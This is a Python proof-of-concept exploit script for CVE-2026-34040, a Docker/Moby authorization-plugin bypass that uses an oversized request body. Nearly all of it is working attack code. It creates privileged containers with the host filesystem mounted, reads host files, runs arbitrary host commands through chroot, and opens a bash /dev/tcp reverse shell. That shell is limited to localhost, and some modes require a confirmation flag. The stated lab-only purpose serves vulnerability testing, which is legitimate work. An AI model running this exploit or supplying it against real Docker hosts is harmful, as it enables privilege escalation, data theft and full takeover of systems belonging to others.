README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-34040 Lab PoC - Docker/Moby AuthZ plugin bypass via oversized request body.
Verified facts:
CVE : CVE-2026-34040
CVSS 3.1 : 8.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
CWE : CWE-288, CWE-863
Affected : moby/moby < 29.3.1, moby/moby/v2 < 2.0.0-beta.8
Fixed in : 29.3.1, 2.0.0-beta.8
Root cause : incomplete fix for CVE-2024-41110
Mechanism : a request body > maxBodySize (1MB in vulnerable versions) makes the
daemon forward an EMPTY body to the AuthZ plugin while the daemon
itself processes the full original request -> AuthZ bypass.
Modes:
check Compare small request vs oversized request.
read-host-file Read a host file through privileged container + host bind mount.
rce-proof Write a marker file on the host using chroot.
host-command Run a user-provided command on the host through chroot.
shell-container Create and start a long-running privileged container for manual chroot.
reverse-shell-local Local lab reverse shell using host network mode.
Scope limitations:
- Local UNIX socket only (/var/run/docker.sock); matches the official AV:L (Local) vector.
- No remote TCP Docker API support
- No scanning
- Intended for authorized lab environments only
"""
from __future__ import annotations
import argparse
import json
import os
import re
import shlex
import socket
import sys
import time
from typing import Optional, Tuple
DEFAULT_SOCKET = "/var/run/docker.sock"
DEFAULT_API_VERSION = "v1.51"
DEFAULT_IMAGE = "alpine"
PADDING_SIZE = 1024 * 1024 + 1
LABEL_BASE = {
"poc": "cve-2026-34040-full-lab",
"lab_only": "true",
}
def oversized_labels() -> dict:
labels = dict(LABEL_BASE)
labels["padding"] = "A" * PADDING_SIZE
return labels
def docker_request(
sock_path: str,
method: str,
path: str,
body: bytes = b"",
timeout: int = 20,
) -> Tuple[int, str, bytes]:
if not os.path.exists(sock_path):
raise FileNotFoundError(f"Docker socket not found: {sock_path}")
req = (
f"{method} {path} HTTP/1.1\r\n"
"Host: docker\r\n"
"User-Agent: cve-2026-34040-full-lab-poc\r\n"
"Content-Type: application/json\r\n"
f"Content-Length: {len(body)}\r\n"
"Connection: close\r\n"
"\r\n"
).encode("utf-8") + body
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect(sock_path)
s.sendall(req)
chunks = []
while True:
try:
data = s.recv(65536)
except socket.timeout:
break
if not data:
break
chunks.append(data)
raw = b"".join(chunks)
header, _, response_body = raw.partition(b"\r\n\r\n")
status_line = header.split(b"\r\n", 1)[0].decode("latin-1", errors="replace")
try:
status_code = int(status_line.split()[1])
except Exception:
status_code = 0
return status_code, status_line, response_body
def json_body(payload: dict) -> bytes:
return json.dumps(payload, separators=(",", ":")).encode("utf-8")
def parse_json_response(body: bytes) -> dict:
try:
return json.loads(body.decode("utf-8", errors="replace"))
except Exception:
return {}
def extract_container_id(body: bytes) -> Optional[str]:
data = parse_json_response(body)
cid = data.get("Id")
if isinstance(cid, str) and cid:
return cid
return None
def print_response(prefix: str, status_line: str, body: bytes, max_body: int = 400) -> None:
print(f"{prefix}: {status_line}")
if body:
text = body[:max_body].decode("utf-8", errors="replace")
print(f"{prefix} body: {text}")
def create_container(
sock: str,
api: str,
name: str,
payload: dict,
timeout: int,
) -> Tuple[int, str, bytes, Optional[str]]:
path = f"/{api}/containers/create?name={name}"
body = json_body(payload)
status, line, resp = docker_request(sock, "POST", path, body, timeout)
return status, line, resp, extract_container_id(resp)
def start_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]:
return docker_request(sock, "POST", f"/{api}/containers/{cid}/start", b"", timeout)
def logs_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]:
return docker_request(
sock,
"GET",
f"/{api}/containers/{cid}/logs?stdout=true&stderr=true",
b"",
timeout,
)
def remove_container(sock: str, api: str, cid: str, timeout: int) -> None:
status, line, body = docker_request(
sock,
"DELETE",
f"/{api}/containers/{cid}?force=true",
b"",
timeout,
)
if status in (204, 404):
print(f"[cleanup] removed or already gone: {cid[:12]}")
else:
print_response("[cleanup warning]", line, body)
def wait_short() -> None:
time.sleep(1.2)
def require_explicit_host_execution(args: argparse.Namespace) -> None:
if not args.i_understand_this_runs_on_host:
print(
"This mode can execute commands on the host in your lab.\n"
"Re-run with --i-understand-this-runs-on-host if this is your authorized test VM.",
file=sys.stderr,
)
raise SystemExit(2)
def build_check_payload(image: str, oversized: bool) -> dict:
labels = oversized_labels() if oversized else dict(LABEL_BASE)
return {
"Image": image,
"Cmd": ["true"],
"HostConfig": {
"Privileged": True
},
"Labels": labels,
}
def mode_check(args: argparse.Namespace) -> int:
unique = int(time.time())
small_name = f"cve-34040-small-{unique}"
big_name = f"cve-34040-big-{unique}"
print("=" * 72)
print("CVE-2026-34040 AuthZ bypass check")
print("=" * 72)
small_payload = build_check_payload(args.image, oversized=False)
big_payload = build_check_payload(args.image, oversized=True)
print("[1] Small request: AuthZ should block this")
print(f" payload size: {len(json_body(small_payload))} bytes")
s_status, s_line, s_body, s_id = create_container(
args.socket, args.api_version, small_name, small_payload, args.timeout
)
print_response(" response", s_line, s_body)
if s_id and not args.keep:
remove_container(args.socket, args.api_version, s_id, args.timeout)
print()
print("[2] Oversized request: vulnerable target may pass AuthZ")
print(f" payload size: {len(json_body(big_payload))} bytes")
b_status, b_line, b_body, b_id = create_container(
args.socket, args.api_version, big_name, big_payload, args.timeout
)
print_response(" response", b_line, b_body)
if b_id and not args.keep:
remove_container(args.socket, args.api_version, b_id, args.timeout)
print()
print("=" * 72)
print("Interpretation")
print("=" * 72)
if s_status != 403:
print("[!] Baseline request was not blocked. AuthZ policy may not be enforcing privileged checks.")
elif b_status == 403:
print("[-] Oversized request was blocked. Target appears patched/protected.")
elif b_status in (201, 404, 400, 409):
print("[+] Bypass behavior observed: small request was denied, oversized request reached Docker processing.")
if b_status == 404:
print(" 404 usually means the image is missing. Run: sudo docker pull alpine")
else:
print("[?] Inconclusive. Review response details manually.")
return 0
def mode_read_host_file(args: argparse.Namespace) -> int:
unique = int(time.time())
name = f"cve-34040-read-{unique}"
host_file = args.host_file
if not host_file.startswith("/"):
print("--host-file must be an absolute path like /etc/hostname", file=sys.stderr)
return 2
# Avoid shell interpolation: pass file path directly to cat.
payload = {
"Image": args.image,
"Cmd": ["cat", f"/host{host_file}"],
"HostConfig": {
"Privileged": True,
"Binds": ["/:/host:ro"],
},
"Labels": oversized_labels(),
}
print("=" * 72)
print("CVE-2026-34040 impact demo: read host file")
print("=" * 72)
print(f"target host file: {host_file}")
status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
print_response("[create]", line, body)
if not cid:
print("No container was created.")
return 1
print(f"[container] {cid}")
start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
print_response("[start]", start_line, start_body)
wait_short()
log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout)
print_response("[logs]", log_line, log_body, max_body=4000)
if not args.keep:
remove_container(args.socket, args.api_version, cid, args.timeout)
else:
print(f"[keep] container kept: {cid}")
return 0
def mode_rce_proof(args: argparse.Namespace) -> int:
require_explicit_host_execution(args)
unique = int(time.time())
name = f"cve-34040-rce-proof-{unique}"
marker = "/tmp/cve_2026_34040_rce_proof"
host_cmd = (
f"id > {shlex.quote(marker)}; "
f"hostname >> {shlex.quote(marker)}; "
f"whoami >> {shlex.quote(marker)}; "
f"date >> {shlex.quote(marker)}"
)
payload = {
"Image": args.image,
"Cmd": [
"/bin/sh",
"-c",
f"chroot /host /bin/bash -lc {shlex.quote(host_cmd)} && cat /host{marker}",
],
"HostConfig": {
"Privileged": True,
"Binds": ["/:/host"],
},
"Labels": oversized_labels(),
}
print("=" * 72)
print("CVE-2026-34040 impact demo: host RCE proof")
print("=" * 72)
print(f"marker file on host: {marker}")
status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
print_response("[create]", line, body)
if not cid:
print("No container was created.")
return 1
print(f"[container] {cid}")
start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
print_response("[start]", start_line, start_body)
wait_short()
log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout)
print_response("[logs]", log_line, log_body, max_body=4000)
print()
print("Verify on host:")
print(f" cat {marker}")
print("Cleanup:")
print(f" sudo rm -f {marker}")
if not args.keep:
remove_container(args.socket, args.api_version, cid, args.timeout)
else:
print(f"[keep] container kept: {cid}")
return 0
def mode_host_command(args: argparse.Namespace) -> int:
require_explicit_host_execution(args)
if not args.cmd:
print("--cmd is required for host-command mode", file=sys.stderr)
return 2
unique = int(time.time())
name = f"cve-34040-host-cmd-{unique}"
payload = {
"Image": args.image,
"Cmd": [
"/bin/sh",
"-c",
f"chroot /host /bin/bash -lc {shlex.quote(args.cmd)}",
],
"HostConfig": {
"Privileged": True,
"Binds": ["/:/host"],
},
"Labels": oversized_labels(),
}
print("=" * 72)
print("CVE-2026-34040 impact demo: host command")
print("=" * 72)
print(f"command: {args.cmd}")
status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
print_response("[create]", line, body)
if not cid:
print("No container was created.")
return 1
print(f"[container] {cid}")
start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
print_response("[start]", start_line, start_body)
wait_short()
log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout)
print_response("[logs]", log_line, log_body, max_body=4000)
if not args.keep:
remove_container(args.socket, args.api_version, cid, args.timeout)
else:
print(f"[keep] container kept: {cid}")
return 0
def mode_shell_container(args: argparse.Namespace) -> int:
unique = int(time.time())
name = f"cve-34040-shell-{unique}"
payload = {
"Image": args.image,
"Cmd": ["sleep", "infinity"],
"HostConfig": {
"Privileged": True,
"Binds": ["/:/host"],
},
"Labels": oversized_labels(),
}
print("=" * 72)
print("CVE-2026-34040 impact demo: long-running privileged container")
print("=" * 72)
status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
print_response("[create]", line, body)
if not cid:
print("No container was created.")
return 1
start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
print_response("[start]", start_line, start_body)
print()
print("[container]")
print(cid)
print()
print("Manual demo commands:")
print(f" sudo docker exec -it {cid} /bin/sh")
print(" chroot /host /bin/bash")
print(" id")
print(" hostname")
print(" whoami")
print()
print("Cleanup:")
print(f" sudo docker rm -f {cid}")
if not args.keep:
print()
print("[note] This mode is useful with --keep. Container is kept by default for this mode.")
print(f"[keep] container kept: {cid}")
return 0
def mode_reverse_shell_local(args: argparse.Namespace) -> int:
require_explicit_host_execution(args)
if args.lhost not in ("127.0.0.1", "localhost"):
print(
"reverse-shell-local only allows --lhost 127.0.0.1 or localhost.\n"
"This is intentional so the packaged lab PoC stays local-only.",
file=sys.stderr,
)
return 2
if not (1 <= args.lport <= 65535):
print("--lport must be between 1 and 65535", file=sys.stderr)
return 2
unique = int(time.time())
name = f"cve-34040-revshell-local-{unique}"
rev_cmd = f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"
payload = {
"Image": args.image,
"Cmd": [
"/bin/sh",
"-c",
f"chroot /host /bin/bash -lc {shlex.quote(rev_cmd)}",
],
"HostConfig": {
"Privileged": True,
"Binds": ["/:/host"],
"NetworkMode": "host",
},
"Labels": oversized_labels(),
}
print("=" * 72)
print("CVE-2026-34040 impact demo: local reverse shell")
print("=" * 72)
print("Before running this mode, open another terminal on the same VM:")
print(f" nc -lvnp {args.lport}")
print()
print(f"reverse shell target: {args.lhost}:{args.lport}")
status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
print_response("[create]", line, body)
if not cid:
print("No container was created.")
return 1
print(f"[container] {cid}")
start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
print_response("[start]", start_line, start_body)
print()
print("If listener is open, the shell should connect there.")
print("Cleanup after demo:")
print(f" sudo docker rm -f {cid}")
if args.keep:
print(f"[keep] container kept: {cid}")
return 0
def build_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser(
description="CVE-2026-34040 full lab PoC over local Docker UNIX socket"
)
parser.add_argument(
"--mode",
choices=[
"check",
"read-host-file",
"rce-proof",
"host-command",
"shell-container",
"reverse-shell-local",
],
default="check",
help="PoC mode",
)
parser.add_argument("--socket", default=DEFAULT_SOCKET, help="Docker UNIX socket path")
parser.add_argument("--api-version", default=DEFAULT_API_VERSION, help="Docker API version, e.g. v1.51")
parser.add_argument("--image", default=DEFAULT_IMAGE, help="Container image to use")
parser.add_argument("--timeout", type=int, default=20, help="Socket timeout in seconds")
parser.add_argument("--keep", action="store_true", help="Keep created containers where applicable")
parser.add_argument("--host-file", default="/etc/hostname", help="Host file path for read-host-file mode")
parser.add_argument("--cmd", help="Host command for host-command mode")
parser.add_argument("--lhost", default="127.0.0.1", help="Local reverse shell host. Only 127.0.0.1/localhost allowed")
parser.add_argument("--lport", type=int, default=4444, help="Local reverse shell port")
parser.add_argument(
"--i-understand-this-runs-on-host",
action="store_true",
help="Required for modes that execute commands on the host in the lab",
)
return parser
def main() -> int:
args = build_parser().parse_args()
if args.mode == "check":
return mode_check(args)
if args.mode == "read-host-file":
return mode_read_host_file(args)
if args.mode == "rce-proof":
return mode_rce_proof(args)
if args.mode == "host-command":
return mode_host_command(args)
if args.mode == "shell-container":
return mode_shell_container(args)
if args.mode == "reverse-shell-local":
return mode_reverse_shell_local(args)
print(f"Unknown mode: {args.mode}", file=sys.stderr)
return 2
if __name__ == "__main__":
try:
raise SystemExit(main())
except PermissionError:
print("Permission denied. Try sudo or an account that can access /var/run/docker.sock.", file=sys.stderr)
raise SystemExit(1)
except FileNotFoundError as e:
print(str(e), file=sys.stderr)
raise SystemExit(1)